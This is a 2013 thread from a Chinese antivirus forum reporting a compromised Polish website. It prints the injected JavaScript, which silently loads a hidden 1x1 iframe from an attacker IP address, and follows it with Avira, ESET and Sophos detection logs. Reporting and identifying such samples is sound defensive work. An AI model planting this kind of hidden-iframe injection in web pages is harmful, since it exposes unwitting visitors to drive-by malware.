查看: 2339|回复: 18
收起左侧

[已鉴定] http://forum.ogar900.pl/tuning-mechaniczny-koszty-vt2132.htm

[复制链接]
fireold
发表于 2013-9-1 16:25:42 | 显示全部楼层 |阅读模式
本帖最后由 fireold 于 2013-9-1 16:26 编辑
  1.                                                                                                                        (function() {
  2.                                                                                                                                                                                                                                                                                                                                                                           var r = document.createElement('iframe');
  3.                                                                                                                                                                                                                                                                                                                                                                           r.src = 'http://188.128.137.211/esd.php';
  4.                                                                                                                                                                                                                                                                                                                                                                           r.style.position = 'absolute';
  5.                                                                                                                                                                                                                                                                                                                                                                           r.style.border = '0';
  6.                                                                                                                                                                                                                                                                                                                                                                           r.style.height = '1px';
  7.                                                                                                                                                                                                                                                                                                                                                                           r.style.width = '1px';
  8.                                                                                                                                                                                                                                                                                                                                                                           r.style.left = '1px';
  9.                                                                                                                                                                                                                                                                                                                                                                           r.style.top = '1px';
  10.                                                                                                                                                                                                                                                                                                                                                                           if (!document.getElementById('r')) {
  11.                                                                                                                                                                                                                                                                                                                                                                               document.write('<div id=\'r\'></div>');
  12.                                                                                                                                                                                                                                                                                                                                                                               document.getElementById('r').appendChild(r);
  13.                                                                                                                                                                                                                                                                                                                                                                           }
  14.                                                                                                                                                                                                                                                                                                                                                                       })();
复制代码



Avira
2013/9/1 下午 04:21 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\STITT9OQ\tuning-mechaniczny-koszty-vt2132[1].htm'
      包含病毒或有害的程式 'JS/Agent.aal.52' [virus]
      已採取動作:
      檔案會移動至 '577c5596.qua' 名稱底下的隔離區目錄。.

2013/9/1 下午 04:21 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        812
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/1 下午 04:20 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\STITT9OQ\jsscripts[1].js'
      包含病毒或有害的程式 'JS/iFrame.kpp' [virus]
      已採取動作:
      檔案會移動至 '55ac5802.qua' 名稱底下的隔離區目錄。.

2013/9/1 下午 04:20 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\G3WIV5EU\rmw_jslib[1].js'
      包含病毒或有害的程式 'JS/iFrame.kpp' [virus]
      已採取動作:
      檔案會移動至 '4d3777af.qua' 名稱底下的隔離區目錄。.

2013/9/1 下午 04:20 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        813
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\G3WIV5EU\rmw_jslib[1].js 中
      偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
      執行的動作:傳輸至掃描程式

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\G3WIV5EU\rmw_jslib[1].js 中
      偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
      執行的動作:拒絕存取

2013/9/1 下午 04:20 [Web Protection] 發現惡意程式碼
      從 URL "http://forum.ogar900.pl/images/rmw_jslib.js" 存取資料時,
      發現病毒或有害的程式 'JS/iFrame.kpp' [virus]。
      已採取動作:已略過

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\STITT9OQ\jsscripts[1].js 中
      偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
      執行的動作:傳輸至掃描程式

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\STITT9OQ\jsscripts[1].js 中
      偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
      執行的動作:拒絕存取

2013/9/1 下午 04:20 [Web Protection] 發現惡意程式碼
      從 URL "http://forum.ogar900.pl/images/jsscripts.js" 存取資料時,
      發現病毒或有害的程式 'JS/iFrame.kpp' [virus]。
      已採取動作:已略過

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\STITT9OQ\tuning-mechaniczny-koszty-vt2132[1].htm 中
      偵測到病毒或有害的程式 'JS/Agent.aal.52 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\STITT9OQ\tuning-mechaniczny-koszty-vt2132[1].htm 中
      偵測到病毒或有害的程式 'JS/Agent.aal.52 [virus]'
      執行的動作:拒絕存取

2013/9/1 下午 04:20 [Web Protection] 發現惡意程式碼
      從 URL "http://forum.ogar900.pl/tuning-mechaniczny-koszty-vt2132.htm" 存取資料時,
      發現病毒或有害的程式 'JS/Agent.aal.52' [virus]。
      已採取動作:已略過


av.jpg





fs.jpg

评分

参与人数 1人气 +1 收起 理由
墨家小子 + 1 版区有你更精彩: )

查看全部评分

GreenCodes
发表于 2013-9-1 18:04:12 | 显示全部楼层
还有效吗?有效的话告诉我好么
墨家小子
发表于 2013-9-1 20:09:44 | 显示全部楼层
GreenCodes 发表于 2013-9-1 18:04
还有效吗?有效的话告诉我好么

单开AV

1.PNG
GreenCodes
发表于 2013-9-1 21:14:13 | 显示全部楼层
本帖最后由 GreenCodes 于 2013-9-1 21:27 编辑
墨家小子 发表于 2013-9-1 20:09
单开AV


今天运气真背实机一次就被过这玩意是干嘛的,自动加书签?
a939707506
头像被屏蔽
发表于 2013-9-1 22:47:22 | 显示全部楼层
ESET SMART SECURITY
2013/9/1 22:43:24        HTTP 过滤器        压缩文件        http://forum.ogar900.pl/images/rmw_jslib.js        JS/Iframe.GJ 特洛伊木马        连接中断 - 已隔离        NT AUTHORITY\ANONYMOUS LOGON        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:43:24        HTTP 过滤器        压缩文件        http://forum.ogar900.pl/images/jsscripts.js        JS/Iframe.GJ 特洛伊木马        连接中断 - 已隔离        NT AUTHORITY\ANONYMOUS LOGON        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:43:22        HTTP 过滤器        压缩文件        http://forum.ogar900.pl/tuning-mechaniczny-koszty-vt2132.htm        JS/Iframe.GJ 特洛伊木马        连接中断 - 已隔离        NT AUTHORITY\ANONYMOUS LOGON        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:37:05        文件系统实时防护        文件        C:\Users\zw\Downloads\未确认 624951.crdownload        Win32/LockScreen.AQD 特洛伊木马        已删除        zw-PC\zw        在被应用程序修改的文件上发生事件: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:36:45        HTTP 过滤器        文件        https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMDgx        Win32/LockScreen.AQD 特洛伊木马        连接中断 - 已隔离        zw-PC\zw        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:33:39        文件系统实时防护        文件        \Device\HarddiskVolume2\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\23629939.bat        BAT/Small.NAN 特洛伊木马        通过删除清除 - 已隔离        NT AUTHORITY\ANONYMOUS LOGON        在应用程序新建的文件上发生事件: C:\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\Rar$EXa0.670\RUqSlBT.exe.
2013/9/1 22:33:11        文件系统实时防护        文件        \Device\HarddiskVolume2\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\23602951.bat        BAT/Small.NAN 特洛伊木马        通过删除清除 - 已隔离        NT AUTHORITY\ANONYMOUS LOGON        在应用程序新建的文件上发生事件: C:\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\Rar$EXa0.925\RUqSlBT.exe.
2013/9/1 22:31:20        文件系统实时防护        文件        \Device\HarddiskVolume2\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\23491270.bat        BAT/Small.NAN 特洛伊木马        通过删除清除 - 已隔离        NT AUTHORITY\ANONYMOUS LOGON        在应用程序新建的文件上发生事件: C:\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\Rar$EXa0.759\RUqSlBT.exe.
2013/9/1 22:26:57        文件系统实时防护        文件        C:\Users\zw\Downloads\未确认 622603.crdownload        Win32/Kryptik.BJII 特洛伊木马 的变种        已删除        zw-PC\zw        在被应用程序修改的文件上发生事件: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:26:38        HTTP 过滤器        文件        https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMTE2        Win32/Kryptik.BJII 特洛伊木马 的变种        连接中断 - 已隔离        zw-PC\zw        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:14:16        HTTP 过滤器        文件        https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMjI0        PHP/Obfuscated.F 潜在的不受欢迎应用程序        连接中断 - 已隔离        zw-PC\zw        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.
2013/9/1 22:10:53        HTTP 过滤器        文件        https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMjU5        Win32/Dorkbot.B 蠕虫        连接中断 - 已隔离        zw-PC\zw        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.
2013/9/1 22:10:34        HTTP 过滤器        文件        https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMjU5        Win32/Injector.ALTZ 特洛伊木马 的变种        连接中断 - 已隔离        zw-PC\zw        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.
2013/9/1 21:04:20        HTTP 过滤器        文件        https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjE5NjUw        Win32/Reveton.U 特洛伊木马        连接中断 - 已隔离        zw-PC\zw        通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.
墨家小子
发表于 2013-9-2 09:10:16 | 显示全部楼层
GreenCodes 发表于 2013-9-1 21:14
今天运气真背实机一次就被过这玩意是干嘛的,自动加书签?

我关闭AV进去还真没发现什么
GreenCodes
发表于 2013-9-2 09:31:43 | 显示全部楼层
墨家小子 发表于 2013-9-2 09:10
我关闭AV进去还真没发现什么

还好运气不错
墨家小子
发表于 2013-9-2 09:33:56 | 显示全部楼层
GreenCodes 发表于 2013-9-2 09:31
还好运气不错

你杯具了吗?

****************** Sophos Anti-Virus 日志记录 - 2013/9/2 1:32:54 **************

    ...
20130902 013227        文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\rmw_jslib.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
20130902 013227        文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\jsscripts.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
20130902 013237        文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\jsscripts.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
20130902 013241        文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\rmw_jslib.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
      (4 个项目)
GreenCodes
发表于 2013-9-2 09:35:27 | 显示全部楼层
墨家小子 发表于 2013-9-2 09:33
你杯具了吗?

****************** Sophos Anti-Virus 日志记录 - 2013/9/2 1:32:54 *********** ...

我想知道症状啊我也不知道有没有悲剧哦
墨家小子
发表于 2013-9-2 09:37:00 | 显示全部楼层
GreenCodes 发表于 2013-9-2 09:35
我想知道症状啊我也不知道有没有悲剧哦

这样
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 06:50 , Processed in 0.174701 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表